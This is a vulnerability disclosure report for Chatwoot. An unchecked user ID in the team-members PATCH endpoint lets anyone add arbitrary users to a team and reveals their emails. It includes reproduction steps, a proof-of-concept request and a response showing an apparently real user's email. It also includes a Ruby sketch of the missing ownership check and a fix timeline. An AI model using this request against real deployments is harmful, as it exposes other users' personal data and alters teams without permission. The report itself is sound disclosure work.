Improper Authorization lets a user add an arbitrary agent to a Team in chatwoot/chatwoot

Valid

Reported on

Aug 15th 2022


Description

A vulnerability in the edit-team function lets a user add any other user to a Team by supplying that user's ID; because the response echoes the added user's record, the same request also discloses the email address of every user in Chatwoot.

Steps to reproduce

  • Log in to the app and navigate to the Team settings: https://app.chatwoot.com/app/accounts/{id}/settings/teams/list
  • Create a new team or edit an existing one
  • Add an agent and intercept the request
  • Modify the user ID in the request body; the response contains that user's email
  • The user is added successfully

Proof of Concept

API: https://app.chatwoot.com/api/v1/accounts/{account.id}/teams/{team_id}/team_members
Method: PATCH
Request body: {"user_ids":[68250]}

Response
[{"id":68250,"account_id":74402,"availability_status":null,"auto_offline":null,"confirmed":false,"email":"amethyst.craft.id@gmail.com","available_name":"Andhra","name":"Andhra","role":null,"thumbnail":""}]

Impact

  • Add arbitrary users to a Team by ID
  • Learn the email address of every user in Chatwoot
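The defect above is a missing ownership check: the endpoint accepts any user ID in `user_ids` instead of restricting it to users who belong to the current account. The Ruby below is an added example, not Chatwoot's code and not the actual fix from commit 329e8c; it uses a constructed in-memory account/user table and a hypothetical `add_team_members` handler to show the vulnerable behaviour beside the scoped check.

```ruby
require 'set'

# Constructed sample data: which user ids belong to which account.
# User 68250 (the id from the report) deliberately sits in a different account.
ACCOUNT_USERS = {
  74402 => [101, 102, 103].freeze,
  99999 => [68250].freeze
}.freeze

class UnauthorizedUser < StandardError; end

# Returns the requested ids only if every one of them is a member of the
# account. Rejecting the whole request (rather than silently dropping foreign
# ids) keeps the endpoint from acting as an oracle for which ids exist.
def authorize_team_member_ids(account_id, requested_ids)
  members = ACCOUNT_USERS.fetch(account_id, []).to_set
  ids = Array(requested_ids).map(&:to_i).uniq
  foreign = ids.reject { |id| members.include?(id) }
  raise UnauthorizedUser, 'user ids not in account' unless foreign.empty?
  ids
end

# Hypothetical PATCH handler. With fixed: false it mirrors the reported
# behaviour (ids trusted as sent); with fixed: true ids are scoped to the
# account first. Returns the new membership list.
def add_team_members(account_id, team_members, body, fixed: true)
  ids = if fixed
          authorize_team_member_ids(account_id, body['user_ids'])
        else
          Array(body['user_ids']).map(&:to_i)
        end
  team_members | ids
end
```

On the fixed path the controller should answer a rejected request with a generic 404 or 422 and never serialize the foreign user's record, which is what turned this bug into an email disclosure.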

We are processing your report and will contact the chatwoot team within 24 hours.
We have contacted a member of the chatwoot team and are waiting to hear back.
Sojan Jose validated this vulnerability.
4rth4s has been awarded the disclosure bounty.
We have sent a fix follow-up to the chatwoot team. We will try again in 7 days.
We have sent a second fix follow-up to the chatwoot team. We will try again in 10 days.
Tejaswini Chile marked this as fixed in 2.8 with commit 329e8c.
Tejaswini Chile has been awarded the fix bounty.
This vulnerability will not receive a CVE.